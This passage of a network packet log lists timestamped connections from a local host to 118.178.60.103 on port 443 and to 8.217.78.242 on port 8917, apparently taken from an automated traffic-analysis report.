                                                                        Jan 14, 2025 05:16:08.848392963 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.848484039 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.849565983 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.849719048 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.849900961 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.850934982 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.851200104 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.851695061 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.851902962 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.852751017 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.852930069 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.853115082 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.854208946 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.854397058 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.855295897 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.855490923 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.856440067 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.856786966 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.856786966 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.857422113 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.857662916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.857662916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.858427048 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.858572006 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.858572006 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.858800888 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.859750032 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.859884977 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.860028028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.861390114 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.861588001 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.862142086 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.862266064 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.862323999 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.863210917 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.863394022 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.864607096 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.864837885 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.865415096 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.865578890 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.865637064 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.866903067 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.867070913 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.868144989 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.868321896 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.868386984 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.869128942 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.869297028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.869477034 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.870115042 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.870340109 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.871155024 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.871325016 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.871505022 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.872859001 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.873076916 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.873260975 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.873972893 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.874211073 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.874803066 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.874990940 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.875617027 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.875767946 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.875849009 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.877058029 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.877263069 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.877446890 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.878043890 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.878267050 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.878871918 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.879048109 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.880281925 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.880542040 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.880894899 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.881048918 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.881215096 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.882050037 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.882246017 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.883683920 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.883896112 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.884288073 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.884537935 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.885638952 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.885898113 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.886521101 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.886766911 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.887336016 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.887537956 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.888813972 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.888950109 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.889012098 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.889722109 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.889929056 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.890882015 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.891021013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.891021013 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.891258001 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.891702890 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.891875029 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.892622948 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.892817974 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.893057108 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.894069910 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.894216061 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.895337105 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.895540953 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.896060944 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.896260023 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.896958113 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.897208929 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.898284912 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.898534060 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.899349928 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.899574995 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.900614977 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.900758028 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.900814056 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.901479006 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.901839018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.901839018 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.902261972 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.902443886 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.902580023 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.902653933 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.902812004 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.902812004 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.902837992 CET44349770118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:08.903012037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:08.903012037 CET49770443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:09.367520094 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:09.367554903 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:09.367714882 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:09.367824078 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:09.367837906 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.301197052 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.301431894 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.301815033 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.301819086 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.303786993 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.303792000 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.626358032 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.626368046 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.626496077 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.626504898 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.626593113 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.626689911 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.626744032 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.627059937 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.627059937 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.629169941 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.629486084 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.629486084 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.635409117 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.635601044 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.635601044 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.635649920 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.638849974 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.639143944 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.644700050 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.644917965 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.645102024 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.647856951 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.648139954 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.651063919 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.651287079 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.657078981 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.657269955 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.660485029 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.660715103 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.666420937 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.666596889 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.666596889 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.669522047 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.669698000 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.672816992 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.673011065 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.673110008 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.678829908 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.678951979 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.679028034 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.679141045 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.679188013 CET49771443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.679198980 CET44349771118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.706686020 CET49772443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.706701040 CET44349772118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:10.707103014 CET49772443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.707290888 CET49772443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:16:10.707294941 CET44349772118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:16:20.650644064 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:20.650856972 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:35.970356941 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:35.970647097 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:51.289035082 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:51.289268017 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:17:06.608520985 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:17:06.608635902 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:17:21.928740025 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:17:21.929002047 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:17:37.247071981 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:17:37.247212887 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:17:52.100802898 CET49772443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:17:52.565717936 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:17:52.565922022 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:18:07.114309072 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:07.114340067 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:07.114485025 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:07.114630938 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:07.114644051 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:07.884896040 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:18:07.885066032 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:18:08.053474903 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.053662062 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.054663897 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.054857016 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.057620049 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.057630062 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.058042049 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.058195114 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.058408022 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.102210045 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.379534960 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.379568100 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.379740953 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.379785061 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.379803896 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.379925966 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.380070925 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.382483959 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.382746935 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.388576031 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.388777971 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.391855001 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.392090082 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.397628069 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.397790909 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.397790909 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.400885105 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.401098013 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.401098013 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.404092073 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.404274940 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.404395103 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.409972906 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.410286903 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.413253069 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.413392067 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.413547039 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.419231892 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.419445992 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.419543028 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.422533989 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.422748089 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.425718069 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.426109076 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.426109076 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.431679964 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.431953907 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.437747955 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.437915087 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.437973976 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.685935020 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.686119080 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.686166048 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.686345100 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.686563015 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.686563015 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.688656092 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.688865900 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.691907883 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.692078114 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.692222118 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.699379921 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.699665070 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.705477953 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.705713034 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.708554983 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.708705902 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.708705902 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.711828947 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.712017059 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.712017059 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.714994907 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.715174913 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.715174913 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.720868111 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.721054077 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.721054077 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.726969957 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.727219105 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.727219105 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.730235100 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.730566978 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.734780073 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.734988928 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.735107899 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.739404917 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.739561081 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.739561081 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.742700100 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.742892027 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.742937088 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.749150991 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.749330997 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.749378920 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.785665989 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.786305904 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.999762058 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:08.999949932 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:08.999949932 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.004101992 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.004308939 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.007541895 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.007781029 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.013267040 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.013458014 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.016659021 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.016819954 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.016916990 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.019706011 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.019922972 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.019922972 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.025594950 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.025867939 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.031779051 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.032083035 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.034857035 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.035161972 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.035209894 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.038290977 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.038570881 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.044126034 CET44349773118.178.60.103192.168.11.20
                                                                        Jan 14, 2025 05:18:09.044261932 CET49773443192.168.11.20118.178.60.103
                                                                        Jan 14, 2025 05:18:09.044359922 CET49773443192.168.11.20118.178.60.103
